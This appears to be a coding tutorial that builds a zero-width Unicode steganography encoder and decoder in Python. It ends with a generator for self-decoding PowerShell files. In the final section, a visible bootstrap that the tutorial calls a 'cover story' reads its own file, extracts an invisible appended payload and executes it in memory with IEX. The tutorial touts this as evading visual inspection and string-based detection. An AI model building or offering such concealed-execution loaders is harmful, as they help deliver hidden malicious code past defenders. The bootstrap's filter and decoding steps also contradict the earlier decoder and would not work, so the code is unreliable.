The Codebook — 16 Symbols, Zero Width
Your alphabet has exactly 16 characters. They all render as nothing. A 16-character set encodes any nibble (4 bits, 0-15) as one invisible character. Pair two nibbles and you have one byte. That's the whole system.
// NOMENCLATURE — PYTHON DATA STRUCTURES
| '\u200B' etc. | Unicode escape sequence: a 4-digit hex code point after \u. U+200B = ZERO WIDTH SPACE. It has no glyph and no advance width, so most renderers draw nothing for it. It is valid Unicode and normally survives copy-paste and file saves, although some editors and sanitizers strip or normalize it. |
| list literal | [item, item, ...]. Ordered sequence, zero-indexed. GHOST_ALPHABET[4] returns the 5th character. ORDER IS THE CODEBOOK: swap entries and previously encoded data no longer decodes correctly. |
| dict comprehension | {key: val for var in iterable}. Builds a dictionary in one expression. Used here to invert the alphabet list into a character→index lookup. |
| enumerate(iterable) | Yields (index, value) pairs. for i, c in enumerate(GHOST_ALPHABET) gives you both the position (0-15) and the character at once, which is exactly what you need to build a reverse map. |
| GHOST_REVERSE | The reverse map: character → index. Given any codebook character, returns its 0-15 value. Built from GHOST_ALPHABET in one line. This is what the decoder uses to reconstruct nibbles. |
| inline comment # 0x0 | Python ignores everything after # on a line. These comments mark which nibble each character encodes. 0x0 = hex zero. Documentation only, not part of the code logic. |
GHOST_ALPHABET = [
    '\u200B',  # 0x0: ZERO WIDTH SPACE (index 0 = nibble value 0)
    '\u200C',  # 0x1: ZERO WIDTH NON-JOINER
    '\u200D',  # 0x2: ZERO WIDTH JOINER
    '\u2060',  # 0x3: WORD JOINER
    '\u2061',  # 0x4: FUNCTION APPLICATION
    '\u2062',  # 0x5: INVISIBLE TIMES
    '\u2063',  # 0x6: INVISIBLE SEPARATOR
    '\u2064',  # 0x7: INVISIBLE PLUS
    '\u206A',  # 0x8: INHIBIT SYMMETRIC SWAPPING
    '\u206B',  # 0x9: ACTIVATE SYMMETRIC SWAPPING
    '\u206C',  # 0xA: INHIBIT ARABIC FORM SHAPING
    '\u206D',  # 0xB: ACTIVATE ARABIC FORM SHAPING
    '\u206E',  # 0xC: NATIONAL DIGIT SHAPES
    '\u206F',  # 0xD: NOMINAL DIGIT SHAPES
    '\uFEFF',  # 0xE: BYTE ORDER MARK (ZERO WIDTH NO-BREAK SPACE)
    '\u180E',  # 0xF: MONGOLIAN VOWEL SEPARATOR
]
# Invert list to dict: {char: index}. enumerate gives (0, '\u200B'), (1, '\u200C'), ...
GHOST_REVERSE = {c: i for i, c in enumerate(GHOST_ALPHABET)}
Write GHOST_ALPHABET (16 \uXXXX escape sequences matching the codebook) and GHOST_REVERSE (one-line dict comprehension reversing it). Exact code points and inline hex comments required.
// WHY THIS WORKS
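These code points are Unicode format characters (general category Cf). They have no glyph of their own, so most renderers draw nothing for them, and ordinary file I/O and copy-paste keep them intact. That is not guaranteed everywhere: some editors show placeholders for them and some sanitizers strip them. The reverse map gives average O(1) lookup during decoding instead of an O(n) linear search through the list. Building it with a one-line dict comprehension over enumerate() is idiomatic Python.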
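As a quick sanity check on the codebook, the following is a minimal sketch. It assumes the code points that match the character names in the codebook comments, and it uses the standard unicodedata module, which the lesson itself does not mention. It checks that the alphabet has 16 distinct entries, collects their general categories, and confirms that the reverse map inverts the list.

```python
import unicodedata

# Code points assumed from the character names in the codebook comments.
GHOST_ALPHABET = [
    '\u200B', '\u200C', '\u200D', '\u2060',  # 0x0-0x3
    '\u2061', '\u2062', '\u2063', '\u2064',  # 0x4-0x7
    '\u206A', '\u206B', '\u206C', '\u206D',  # 0x8-0xB
    '\u206E', '\u206F', '\uFEFF', '\u180E',  # 0xC-0xF
]
GHOST_REVERSE = {c: i for i, c in enumerate(GHOST_ALPHABET)}

# 16 distinct characters: a duplicate entry would collapse two nibbles
# onto one dict key and make decoding ambiguous.
assert len(GHOST_ALPHABET) == 16
assert len(GHOST_REVERSE) == 16

# Collect the Unicode general category of every entry.
categories = {unicodedata.category(c) for c in GHOST_ALPHABET}

# The reverse map must send each character back to its own index.
round_trip_ok = all(GHOST_REVERSE[GHOST_ALPHABET[i]] == i for i in range(16))

print(categories, round_trip_ok)
```

Running a check like this after any change to the list catches a duplicated or mistyped code point before it corrupts encoded data.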
Splitting the Byte — Nibble by Nibble
Every byte is 8 bits. Split it in half: top 4 bits (high nibble) and bottom 4 bits (low nibble). Each nibble is 0-15 — exactly the index range of the 16-character alphabet. Two invisible characters per byte, zero data loss.
// NOMENCLATURE — BIT OPERATIONS
| nibble | Half a byte. 4 bits. Holds 0-15. "High nibble" = top 4 bits. "Low nibble" = bottom 4 bits. Two nibbles reconstruct one byte perfectly. |
| byte >> 4 | Right shift by 4 positions. Moves bits 4-7 down to positions 0-3. Bottom 4 bits fall off the edge. Result = high nibble as integer 0-15. |
| & 0x0F | Bitwise AND with 0b00001111. Zeroes out top 4 bits, passes bottom 4 unchanged. Result = low nibble as integer 0-15. Also applied after >> as a safety mask. |
| for byte in data | Iterating a bytes object yields integers 0-255, not characters. Each iteration gives you one byte as an int you can do bit math on. |
| encoded.append() | Adds to end of list. Two appends per byte (high nibble char first, then low nibble char). Result list is exactly 2× the length of input bytes. |
| ''.join(encoded) | Joins list of strings into one string with empty separator. Standard Python: faster than + in a loop, works for any list size. |
| type annotation | data: bytes and -> str are documentation hints. Python doesn't enforce them at runtime. They clarify intent: bytes in, invisible string out. |
def encode_bytes(data: bytes) -> str:  # bytes in, invisible-encoded string out
    encoded = []
    for byte in data:  # iterating bytes yields integers 0-255
        high = (byte >> 4) & 0x0F  # shift right 4: high nibble in bits 0-3, masked 0-15
        low = byte & 0x0F  # AND mask: isolate bottom 4 bits → low nibble 0-15
        encoded.append(GHOST_ALPHABET[high])  # high nibble index → invisible char
        encoded.append(GHOST_ALPHABET[low])  # low nibble index → invisible char
    return ''.join(encoded)  # join list → one invisible string
Write encode_bytes(). Iterate bytes, extract high/low nibbles with bit ops, look each up in GHOST_ALPHABET, append both chars, join and return. Include type annotations.
// WHY THIS WORKS
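The & 0x0F after the right shift is defensive. Iterating a real bytes object only ever yields 0-255, so byte >> 4 is already 0-15 and the mask changes nothing. It matters only if a caller ignores the annotation and passes an iterable of larger integers: Python integers have arbitrary precision, so 300 >> 4 is 18, which would index past the end of GHOST_ALPHABET. The mask costs one extra operation per byte and guarantees the index is always valid (0-15).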
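The bit arithmetic can be worked through on a single value. This is a small sketch; split_nibbles and join_nibbles are hypothetical helper names used only for illustration and are not part of the lesson's code.

```python
def split_nibbles(value: int) -> tuple:
    """Return (high, low) nibbles of value, each masked to 0-15."""
    high = (value >> 4) & 0x0F  # bits 4-7 moved down to bits 0-3
    low = value & 0x0F          # bits 0-3 kept, everything above cleared
    return high, low


def join_nibbles(high: int, low: int) -> int:
    """Inverse of split_nibbles for values in 0-255."""
    return (high << 4) | low


# 0xA7 = 0b1010_0111: high nibble 0b1010 (0xA), low nibble 0b0111 (0x7).
high, low = split_nibbles(0xA7)
assert (high, low) == (0xA, 0x7)
assert join_nibbles(high, low) == 0xA7

# Every value a bytes object can yield survives the split/join round trip.
assert all(join_nibbles(*split_nibbles(b)) == b for b in range(256))

# Out-of-range input: without the mask the high "nibble" would be 18,
# which is not a valid index into a 16-entry list.
assert 300 >> 4 == 18
assert split_nibbles(300) == (2, 12)
```

The last two assertions show what the mask buys: the index stays in range, but the value 300 is no longer recoverable, so the mask prevents a crash rather than preserving data.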
Reading the Invisible — Reassembling Bytes
You receive text that may look normal. Scan every character — keep only ones in the codebook, discard everything else. Pair them: high nibble + low nibble → one byte. All visible text characters fail the codebook test and vanish silently.
// NOMENCLATURE — DECODING + LIST COMPREHENSIONS
| list comprehension | [expr for var in iterable if condition]. Filters and transforms in one expression. The if is optional. Shorter than a for-loop with if + append, and usually a little faster in CPython. |
| c in GHOST_REVERSE | Dictionary key membership test, O(1) on average. Returns True only if c is in the codebook. Every character outside the codebook, including all visible ASCII, fails this test and is silently discarded. |
| range(0, len, 2) | Range with step=2. Generates 0, 2, 4, 6... Processes a list two elements at a time without overlap. Element i = high nibble, element i+1 = low nibble. |
| GHOST_REVERSE[char] | Dictionary lookup: char → nibble index 0-15. The inverse of GHOST_ALPHABET[index]. Average O(1) lookup; the dict is built once at import time. |
| (high << 4) | low | Reconstruct the byte. Left-shift high nibble 4 positions back to bits 4-7, then OR in the low nibble. Exact inverse of (byte >> 4) and (byte & 0x0F). |
| bytes(result) | Convert list of integers to a bytes object. Each integer must be 0-255, otherwise bytes() raises ValueError. Returns the decoded binary data. |
def decode_ghost(ghost_text: str) -> bytes:
    result = []
    # Filter: keep only chars in the codebook. Visible text gets discarded.
    chars = [c for c in ghost_text if c in GHOST_REVERSE]
    # An odd count means one nibble has no partner: drop it instead of raising IndexError.
    if len(chars) % 2:
        chars = chars[:-1]
    # Process in pairs: [0]+[1]=byte0, [2]+[3]=byte1, etc.
    for i in range(0, len(chars), 2):
        high = GHOST_REVERSE[chars[i]]  # first of pair → high nibble 0-15
        low = GHOST_REVERSE[chars[i + 1]]  # second of pair → low nibble 0-15
        result.append((high << 4) | low)  # shift high to bits 4-7, OR in low → original byte
    return bytes(result)  # list of ints → bytes
Write decode_ghost(). Filter to codebook chars only. Iterate pairs with range step=2. Reconstruct each byte with shift + OR. Return as bytes.
// WHY THIS WORKS
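The filter step is what makes Ghost tolerant of added visible noise. If the encoded text passes through a system that inserts whitespace or line breaks, those characters aren't in GHOST_REVERSE and are silently dropped, so the decoder only processes codebook characters. No framing or length prefix is needed as long as the carrier contains no codebook characters of its own. The scheme cannot recover from lost or extra codebook characters: a stripped character, or a stray one in the carrier (a ZERO WIDTH JOINER inside an emoji sequence, a BYTE ORDER MARK at the start of a file), shifts every later nibble pair and corrupts the rest of the output.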
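The round trip and the noise behaviour can be checked end to end. This is a self-contained sketch under two assumptions: the code points match the character names in the codebook, and a trailing unpaired character is dropped rather than treated as an error. The carrier sentences are made up for the example.

```python
# Code points assumed from the character names in the codebook comments.
GHOST_ALPHABET = [
    '\u200B', '\u200C', '\u200D', '\u2060',
    '\u2061', '\u2062', '\u2063', '\u2064',
    '\u206A', '\u206B', '\u206C', '\u206D',
    '\u206E', '\u206F', '\uFEFF', '\u180E',
]
GHOST_REVERSE = {c: i for i, c in enumerate(GHOST_ALPHABET)}


def encode_bytes(data: bytes) -> str:
    """Two codebook characters per byte: high nibble first, then low."""
    encoded = []
    for byte in data:
        encoded.append(GHOST_ALPHABET[(byte >> 4) & 0x0F])
        encoded.append(GHOST_ALPHABET[byte & 0x0F])
    return ''.join(encoded)


def decode_ghost(ghost_text: str) -> bytes:
    """Keep only codebook characters, then rebuild bytes from nibble pairs."""
    chars = [c for c in ghost_text if c in GHOST_REVERSE]
    if len(chars) % 2:  # assumption: ignore a trailing unpaired nibble
        chars = chars[:-1]
    return bytes(
        (GHOST_REVERSE[chars[i]] << 4) | GHOST_REVERSE[chars[i + 1]]
        for i in range(0, len(chars), 2)
    )


secret = "héllo".encode("utf-8")  # 6 bytes: é takes two bytes in UTF-8
hidden = encode_bytes(secret)
assert len(hidden) == 2 * len(secret)

# Visible text, spaces, tabs, and newlines around and inside the encoded
# run are filtered out, so the original bytes come back unchanged.
carrier = "Meeting at noon.\n" + hidden[:4] + " \t\n" + hidden[4:] + "See you there."
recovered = decode_ghost(carrier)
assert recovered == secret

# One stray codebook character ahead of the data shifts every nibble pair,
# so the decoder returns different bytes without raising any error.
corrupted = decode_ghost('\u200D' + carrier)
assert corrupted != secret
```

The final assertion is the failure mode to keep in mind: misalignment is silent, so a checksum or length field would be needed to detect it, and neither is part of the scheme as described.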
The Self-Decoding Wrapper — One File, Two Layers
The output .ps1 file has two layers: a visible PowerShell bootstrap (reads itself, extracts the hidden payload, decodes and runs it) and the invisible encoded payload appended at the end. No external decoder. The file carries its own key.
// NOMENCLATURE — STRING GENERATION + POWERSHELL BOOTSTRAP
.encode('utf-8') | Convert Python string to bytes using UTF-8. encode_bytes() operates on bytes, not strings — always encode the PS1 payload text before passing it in. |
| adjacent string literals | ("line1\n" "line2\n") — Python automatically concatenates adjacent string literals inside parentheses at compile time. Builds multi-line strings without triple-quotes or explicit +. |
$PSCommandPath | PowerShell automatic variable. Full path of the currently executing script. The bootstrap uses this to read its own source from disk. |
.ToCharArray() | Converts string to array of characters. Required to pipe individual chars through Where-Object (the ?{...} filter block). |
[int][char]$_ -lt 33 | Cast char to int, compare to 33. Filters for characters with low Unicode code points. The encoded invisible payload characters fall in a specific range this filter targets. |
IEX | Invoke-Expression. Executes a string as PowerShell code in the current session. The decoded payload runs in memory — no file written to disk. |
simple_stub + encoded | Concatenate: visible bootstrap PS1 code + invisible encoded payload. Together they form the final .ps1 file. Bootstrap runs when executed; payload rides invisibly inside. |
def generate_ghost_ps1(payload_ps1: str) -> str:
payload_bytes = payload_ps1.encode('utf-8') # PS1 text → bytes (encode_bytes needs bytes)
encoded = encode_bytes(payload_bytes) # bytes → invisible string via GHOST_ALPHABET
simple_stub = (
"# ghost\n" # visible PS1 comment — cover story
"$src = [IO.File]::ReadAllText($PSCommandPath)\n" # script reads itself from disk
"$zw = [string]::new(($src.ToCharArray() | ?{[int][char]$_ -lt 33}))\n" # filter to low-codepoint chars
"$b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($zw))\n" # encode filtered chars as base64
"IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)))\n" # decode + execute in memory
)
return simple_stub + encoded # visible bootstrap + invisible payload = one .ps1
Write generate_ghost_ps1(). Encode the payload to bytes, run encode_bytes(), build the PS1 stub as adjacent string literals inside parentheses, return stub + encoded payload.
// WHY THIS WORKS
The bootstrap is entirely printable ASCII — passes visual inspection and most string-based detection. The encoded payload is all invisible Unicode — matches no known PowerShell pattern. The file is self-contained: no decoder binary, no external key. One .ps1 file, two invisible layers.
// GHOST ENCODER — COMPLETE
Invisible ink alphabet. Nibble encoder. Reverse decoder. Self-decoding PS1 bootstrap.
Unicode steganography from first principles.